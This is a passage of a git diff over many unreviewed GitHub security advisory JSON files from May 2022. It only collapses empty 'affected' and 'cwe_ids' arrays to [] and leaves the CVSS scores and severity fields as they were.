b/advisories/unreviewed/2022/05/GHSA-2g6x-rfgr-7f5j/GHSA-2g6x-rfgr-7f5j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2h2f-fpww-2pr8/GHSA-2h2f-fpww-2pr8.json b/advisories/unreviewed/2022/05/GHSA-2h2f-fpww-2pr8/GHSA-2h2f-fpww-2pr8.json index b4ac14a23ab..028574b6982 100644 --- a/advisories/unreviewed/2022/05/GHSA-2h2f-fpww-2pr8/GHSA-2h2f-fpww-2pr8.json +++ b/advisories/unreviewed/2022/05/GHSA-2h2f-fpww-2pr8/GHSA-2h2f-fpww-2pr8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2hpv-9j64-vq9f/GHSA-2hpv-9j64-vq9f.json b/advisories/unreviewed/2022/05/GHSA-2hpv-9j64-vq9f/GHSA-2hpv-9j64-vq9f.json index da790455fc4..1715e218a20 100644 --- a/advisories/unreviewed/2022/05/GHSA-2hpv-9j64-vq9f/GHSA-2hpv-9j64-vq9f.json +++ b/advisories/unreviewed/2022/05/GHSA-2hpv-9j64-vq9f/GHSA-2hpv-9j64-vq9f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2jr3-p4jr-g977/GHSA-2jr3-p4jr-g977.json b/advisories/unreviewed/2022/05/GHSA-2jr3-p4jr-g977/GHSA-2jr3-p4jr-g977.json index 652879947de..76d5c46b1d6 100644 --- a/advisories/unreviewed/2022/05/GHSA-2jr3-p4jr-g977/GHSA-2jr3-p4jr-g977.json +++ b/advisories/unreviewed/2022/05/GHSA-2jr3-p4jr-g977/GHSA-2jr3-p4jr-g977.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2m4v-vm5r-wqxw/GHSA-2m4v-vm5r-wqxw.json b/advisories/unreviewed/2022/05/GHSA-2m4v-vm5r-wqxw/GHSA-2m4v-vm5r-wqxw.json index bbab641e19f..069f22f02db 100644 --- a/advisories/unreviewed/2022/05/GHSA-2m4v-vm5r-wqxw/GHSA-2m4v-vm5r-wqxw.json +++ b/advisories/unreviewed/2022/05/GHSA-2m4v-vm5r-wqxw/GHSA-2m4v-vm5r-wqxw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2m59-f8jp-rr4w/GHSA-2m59-f8jp-rr4w.json b/advisories/unreviewed/2022/05/GHSA-2m59-f8jp-rr4w/GHSA-2m59-f8jp-rr4w.json index cd346186774..2c3a74a51c1 100644 --- a/advisories/unreviewed/2022/05/GHSA-2m59-f8jp-rr4w/GHSA-2m59-f8jp-rr4w.json +++ b/advisories/unreviewed/2022/05/GHSA-2m59-f8jp-rr4w/GHSA-2m59-f8jp-rr4w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2mgq-r8qg-4f9c/GHSA-2mgq-r8qg-4f9c.json b/advisories/unreviewed/2022/05/GHSA-2mgq-r8qg-4f9c/GHSA-2mgq-r8qg-4f9c.json index b2ee45a3ad3..f307f72160c 100644 --- a/advisories/unreviewed/2022/05/GHSA-2mgq-r8qg-4f9c/GHSA-2mgq-r8qg-4f9c.json +++ b/advisories/unreviewed/2022/05/GHSA-2mgq-r8qg-4f9c/GHSA-2mgq-r8qg-4f9c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2mpj-5wq9-73rr/GHSA-2mpj-5wq9-73rr.json b/advisories/unreviewed/2022/05/GHSA-2mpj-5wq9-73rr/GHSA-2mpj-5wq9-73rr.json index e299f6499ff..55f8d0ecf67 100644 --- a/advisories/unreviewed/2022/05/GHSA-2mpj-5wq9-73rr/GHSA-2mpj-5wq9-73rr.json +++ b/advisories/unreviewed/2022/05/GHSA-2mpj-5wq9-73rr/GHSA-2mpj-5wq9-73rr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2qwj-2xpr-m26w/GHSA-2qwj-2xpr-m26w.json b/advisories/unreviewed/2022/05/GHSA-2qwj-2xpr-m26w/GHSA-2qwj-2xpr-m26w.json index 737ea232d22..b987380f3c3 100644 --- a/advisories/unreviewed/2022/05/GHSA-2qwj-2xpr-m26w/GHSA-2qwj-2xpr-m26w.json +++ b/advisories/unreviewed/2022/05/GHSA-2qwj-2xpr-m26w/GHSA-2qwj-2xpr-m26w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2r72-mfwr-5645/GHSA-2r72-mfwr-5645.json b/advisories/unreviewed/2022/05/GHSA-2r72-mfwr-5645/GHSA-2r72-mfwr-5645.json index 78a07c90ea6..d968023bc35 100644 --- a/advisories/unreviewed/2022/05/GHSA-2r72-mfwr-5645/GHSA-2r72-mfwr-5645.json +++ b/advisories/unreviewed/2022/05/GHSA-2r72-mfwr-5645/GHSA-2r72-mfwr-5645.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2rfj-6m9g-g5xr/GHSA-2rfj-6m9g-g5xr.json b/advisories/unreviewed/2022/05/GHSA-2rfj-6m9g-g5xr/GHSA-2rfj-6m9g-g5xr.json index 371db96afb4..5d430cf1dab 100644 --- a/advisories/unreviewed/2022/05/GHSA-2rfj-6m9g-g5xr/GHSA-2rfj-6m9g-g5xr.json +++ b/advisories/unreviewed/2022/05/GHSA-2rfj-6m9g-g5xr/GHSA-2rfj-6m9g-g5xr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2v38-4f43-wqh2/GHSA-2v38-4f43-wqh2.json b/advisories/unreviewed/2022/05/GHSA-2v38-4f43-wqh2/GHSA-2v38-4f43-wqh2.json index 851a8d93445..e7ee623b2c5 100644 --- a/advisories/unreviewed/2022/05/GHSA-2v38-4f43-wqh2/GHSA-2v38-4f43-wqh2.json +++ b/advisories/unreviewed/2022/05/GHSA-2v38-4f43-wqh2/GHSA-2v38-4f43-wqh2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2v52-33cv-3wm5/GHSA-2v52-33cv-3wm5.json b/advisories/unreviewed/2022/05/GHSA-2v52-33cv-3wm5/GHSA-2v52-33cv-3wm5.json index b20d80c0497..c6146c1ff30 100644 --- a/advisories/unreviewed/2022/05/GHSA-2v52-33cv-3wm5/GHSA-2v52-33cv-3wm5.json +++ b/advisories/unreviewed/2022/05/GHSA-2v52-33cv-3wm5/GHSA-2v52-33cv-3wm5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2w7c-2x4v-g9g3/GHSA-2w7c-2x4v-g9g3.json b/advisories/unreviewed/2022/05/GHSA-2w7c-2x4v-g9g3/GHSA-2w7c-2x4v-g9g3.json index ae14904c776..e8ab7b0ec64 100644 --- a/advisories/unreviewed/2022/05/GHSA-2w7c-2x4v-g9g3/GHSA-2w7c-2x4v-g9g3.json +++ b/advisories/unreviewed/2022/05/GHSA-2w7c-2x4v-g9g3/GHSA-2w7c-2x4v-g9g3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2x4x-73fj-7gr8/GHSA-2x4x-73fj-7gr8.json b/advisories/unreviewed/2022/05/GHSA-2x4x-73fj-7gr8/GHSA-2x4x-73fj-7gr8.json index 0a522cee5fb..8f26fef12be 100644 --- a/advisories/unreviewed/2022/05/GHSA-2x4x-73fj-7gr8/GHSA-2x4x-73fj-7gr8.json +++ b/advisories/unreviewed/2022/05/GHSA-2x4x-73fj-7gr8/GHSA-2x4x-73fj-7gr8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2x6c-ggqq-38q8/GHSA-2x6c-ggqq-38q8.json b/advisories/unreviewed/2022/05/GHSA-2x6c-ggqq-38q8/GHSA-2x6c-ggqq-38q8.json index a76ca542abf..50c08005990 100644 --- a/advisories/unreviewed/2022/05/GHSA-2x6c-ggqq-38q8/GHSA-2x6c-ggqq-38q8.json +++ b/advisories/unreviewed/2022/05/GHSA-2x6c-ggqq-38q8/GHSA-2x6c-ggqq-38q8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3239-92hh-5wpq/GHSA-3239-92hh-5wpq.json b/advisories/unreviewed/2022/05/GHSA-3239-92hh-5wpq/GHSA-3239-92hh-5wpq.json index 5b3a14de5a4..e8ce051a304 100644 --- a/advisories/unreviewed/2022/05/GHSA-3239-92hh-5wpq/GHSA-3239-92hh-5wpq.json +++ b/advisories/unreviewed/2022/05/GHSA-3239-92hh-5wpq/GHSA-3239-92hh-5wpq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-323v-h623-mm25/GHSA-323v-h623-mm25.json b/advisories/unreviewed/2022/05/GHSA-323v-h623-mm25/GHSA-323v-h623-mm25.json index dcfc3d13c3c..e48bf2f369a 100644 --- a/advisories/unreviewed/2022/05/GHSA-323v-h623-mm25/GHSA-323v-h623-mm25.json +++ b/advisories/unreviewed/2022/05/GHSA-323v-h623-mm25/GHSA-323v-h623-mm25.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-338h-x8vx-j29w/GHSA-338h-x8vx-j29w.json b/advisories/unreviewed/2022/05/GHSA-338h-x8vx-j29w/GHSA-338h-x8vx-j29w.json index 8a9bee33a2b..45e9b165cc6 100644 --- a/advisories/unreviewed/2022/05/GHSA-338h-x8vx-j29w/GHSA-338h-x8vx-j29w.json +++ b/advisories/unreviewed/2022/05/GHSA-338h-x8vx-j29w/GHSA-338h-x8vx-j29w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-33j5-vcmx-vxmx/GHSA-33j5-vcmx-vxmx.json b/advisories/unreviewed/2022/05/GHSA-33j5-vcmx-vxmx/GHSA-33j5-vcmx-vxmx.json index c6dd46b238d..ef79d6977df 100644 --- a/advisories/unreviewed/2022/05/GHSA-33j5-vcmx-vxmx/GHSA-33j5-vcmx-vxmx.json +++ b/advisories/unreviewed/2022/05/GHSA-33j5-vcmx-vxmx/GHSA-33j5-vcmx-vxmx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-363x-93mm-c7qx/GHSA-363x-93mm-c7qx.json b/advisories/unreviewed/2022/05/GHSA-363x-93mm-c7qx/GHSA-363x-93mm-c7qx.json index 07cacb772a3..cfcb917345d 100644 --- a/advisories/unreviewed/2022/05/GHSA-363x-93mm-c7qx/GHSA-363x-93mm-c7qx.json +++ b/advisories/unreviewed/2022/05/GHSA-363x-93mm-c7qx/GHSA-363x-93mm-c7qx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-38rh-v3hv-97q5/GHSA-38rh-v3hv-97q5.json b/advisories/unreviewed/2022/05/GHSA-38rh-v3hv-97q5/GHSA-38rh-v3hv-97q5.json index 74852c79887..a124afead0e 100644 --- a/advisories/unreviewed/2022/05/GHSA-38rh-v3hv-97q5/GHSA-38rh-v3hv-97q5.json +++ b/advisories/unreviewed/2022/05/GHSA-38rh-v3hv-97q5/GHSA-38rh-v3hv-97q5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-39j5-2v2p-qwjp/GHSA-39j5-2v2p-qwjp.json b/advisories/unreviewed/2022/05/GHSA-39j5-2v2p-qwjp/GHSA-39j5-2v2p-qwjp.json index 6c725ed4d1b..b9eb3b1a73a 100644 --- a/advisories/unreviewed/2022/05/GHSA-39j5-2v2p-qwjp/GHSA-39j5-2v2p-qwjp.json +++ b/advisories/unreviewed/2022/05/GHSA-39j5-2v2p-qwjp/GHSA-39j5-2v2p-qwjp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3cff-w6rq-c82x/GHSA-3cff-w6rq-c82x.json b/advisories/unreviewed/2022/05/GHSA-3cff-w6rq-c82x/GHSA-3cff-w6rq-c82x.json index 784932bc516..837d8a3dff5 100644 --- a/advisories/unreviewed/2022/05/GHSA-3cff-w6rq-c82x/GHSA-3cff-w6rq-c82x.json +++ b/advisories/unreviewed/2022/05/GHSA-3cff-w6rq-c82x/GHSA-3cff-w6rq-c82x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3jh6-397c-67wx/GHSA-3jh6-397c-67wx.json b/advisories/unreviewed/2022/05/GHSA-3jh6-397c-67wx/GHSA-3jh6-397c-67wx.json index 2b94389df2e..3114f95bf59 100644 --- a/advisories/unreviewed/2022/05/GHSA-3jh6-397c-67wx/GHSA-3jh6-397c-67wx.json +++ b/advisories/unreviewed/2022/05/GHSA-3jh6-397c-67wx/GHSA-3jh6-397c-67wx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3jm5-8qwr-jvwm/GHSA-3jm5-8qwr-jvwm.json b/advisories/unreviewed/2022/05/GHSA-3jm5-8qwr-jvwm/GHSA-3jm5-8qwr-jvwm.json index 3cfbdb8e046..f5e2550f878 100644 --- a/advisories/unreviewed/2022/05/GHSA-3jm5-8qwr-jvwm/GHSA-3jm5-8qwr-jvwm.json +++ b/advisories/unreviewed/2022/05/GHSA-3jm5-8qwr-jvwm/GHSA-3jm5-8qwr-jvwm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3jvr-3w2h-527p/GHSA-3jvr-3w2h-527p.json b/advisories/unreviewed/2022/05/GHSA-3jvr-3w2h-527p/GHSA-3jvr-3w2h-527p.json index 0f410101396..7b66c0eaa8c 100644 --- a/advisories/unreviewed/2022/05/GHSA-3jvr-3w2h-527p/GHSA-3jvr-3w2h-527p.json +++ b/advisories/unreviewed/2022/05/GHSA-3jvr-3w2h-527p/GHSA-3jvr-3w2h-527p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3pj8-7wgv-fm2r/GHSA-3pj8-7wgv-fm2r.json b/advisories/unreviewed/2022/05/GHSA-3pj8-7wgv-fm2r/GHSA-3pj8-7wgv-fm2r.json index d34302ff03e..47b55cff5f7 100644 --- a/advisories/unreviewed/2022/05/GHSA-3pj8-7wgv-fm2r/GHSA-3pj8-7wgv-fm2r.json +++ b/advisories/unreviewed/2022/05/GHSA-3pj8-7wgv-fm2r/GHSA-3pj8-7wgv-fm2r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3pwh-chfw-xjh7/GHSA-3pwh-chfw-xjh7.json b/advisories/unreviewed/2022/05/GHSA-3pwh-chfw-xjh7/GHSA-3pwh-chfw-xjh7.json index c1f77446127..969e0d78da1 100644 --- a/advisories/unreviewed/2022/05/GHSA-3pwh-chfw-xjh7/GHSA-3pwh-chfw-xjh7.json +++ b/advisories/unreviewed/2022/05/GHSA-3pwh-chfw-xjh7/GHSA-3pwh-chfw-xjh7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3r44-xhxh-qh7x/GHSA-3r44-xhxh-qh7x.json b/advisories/unreviewed/2022/05/GHSA-3r44-xhxh-qh7x/GHSA-3r44-xhxh-qh7x.json index 6ace68ec98d..79af18ef3db 100644 --- a/advisories/unreviewed/2022/05/GHSA-3r44-xhxh-qh7x/GHSA-3r44-xhxh-qh7x.json +++ b/advisories/unreviewed/2022/05/GHSA-3r44-xhxh-qh7x/GHSA-3r44-xhxh-qh7x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3r7x-fw6m-4w78/GHSA-3r7x-fw6m-4w78.json b/advisories/unreviewed/2022/05/GHSA-3r7x-fw6m-4w78/GHSA-3r7x-fw6m-4w78.json index e89365eac09..8dea86544d9 100644 --- a/advisories/unreviewed/2022/05/GHSA-3r7x-fw6m-4w78/GHSA-3r7x-fw6m-4w78.json +++ b/advisories/unreviewed/2022/05/GHSA-3r7x-fw6m-4w78/GHSA-3r7x-fw6m-4w78.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3vjv-6jp4-c68f/GHSA-3vjv-6jp4-c68f.json b/advisories/unreviewed/2022/05/GHSA-3vjv-6jp4-c68f/GHSA-3vjv-6jp4-c68f.json index 3f97e6c2adb..36af0c39d8c 100644 --- a/advisories/unreviewed/2022/05/GHSA-3vjv-6jp4-c68f/GHSA-3vjv-6jp4-c68f.json +++ b/advisories/unreviewed/2022/05/GHSA-3vjv-6jp4-c68f/GHSA-3vjv-6jp4-c68f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3vjv-rwr9-f593/GHSA-3vjv-rwr9-f593.json b/advisories/unreviewed/2022/05/GHSA-3vjv-rwr9-f593/GHSA-3vjv-rwr9-f593.json index 2b6917797a8..9664ca9f92c 100644 --- a/advisories/unreviewed/2022/05/GHSA-3vjv-rwr9-f593/GHSA-3vjv-rwr9-f593.json +++ b/advisories/unreviewed/2022/05/GHSA-3vjv-rwr9-f593/GHSA-3vjv-rwr9-f593.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3x3v-84v2-gwh2/GHSA-3x3v-84v2-gwh2.json b/advisories/unreviewed/2022/05/GHSA-3x3v-84v2-gwh2/GHSA-3x3v-84v2-gwh2.json index a61ab70f6d7..3faa8d53d4c 100644 --- a/advisories/unreviewed/2022/05/GHSA-3x3v-84v2-gwh2/GHSA-3x3v-84v2-gwh2.json +++ b/advisories/unreviewed/2022/05/GHSA-3x3v-84v2-gwh2/GHSA-3x3v-84v2-gwh2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4236-7hj3-75v7/GHSA-4236-7hj3-75v7.json b/advisories/unreviewed/2022/05/GHSA-4236-7hj3-75v7/GHSA-4236-7hj3-75v7.json index 548de05a860..f777a95facd 100644 --- a/advisories/unreviewed/2022/05/GHSA-4236-7hj3-75v7/GHSA-4236-7hj3-75v7.json +++ b/advisories/unreviewed/2022/05/GHSA-4236-7hj3-75v7/GHSA-4236-7hj3-75v7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-42mm-766g-hj5r/GHSA-42mm-766g-hj5r.json b/advisories/unreviewed/2022/05/GHSA-42mm-766g-hj5r/GHSA-42mm-766g-hj5r.json index 8e87afd9007..b909b594532 100644 --- a/advisories/unreviewed/2022/05/GHSA-42mm-766g-hj5r/GHSA-42mm-766g-hj5r.json +++ b/advisories/unreviewed/2022/05/GHSA-42mm-766g-hj5r/GHSA-42mm-766g-hj5r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-42x4-7rwv-4vjm/GHSA-42x4-7rwv-4vjm.json b/advisories/unreviewed/2022/05/GHSA-42x4-7rwv-4vjm/GHSA-42x4-7rwv-4vjm.json index f3b875b1d3e..1d40ba52370 100644 --- a/advisories/unreviewed/2022/05/GHSA-42x4-7rwv-4vjm/GHSA-42x4-7rwv-4vjm.json +++ b/advisories/unreviewed/2022/05/GHSA-42x4-7rwv-4vjm/GHSA-42x4-7rwv-4vjm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4476-jj98-xj5g/GHSA-4476-jj98-xj5g.json b/advisories/unreviewed/2022/05/GHSA-4476-jj98-xj5g/GHSA-4476-jj98-xj5g.json index 24e0c1760b3..21a3004b778 100644 --- a/advisories/unreviewed/2022/05/GHSA-4476-jj98-xj5g/GHSA-4476-jj98-xj5g.json +++ b/advisories/unreviewed/2022/05/GHSA-4476-jj98-xj5g/GHSA-4476-jj98-xj5g.json @@ -13,9 +13,7 @@ "score": 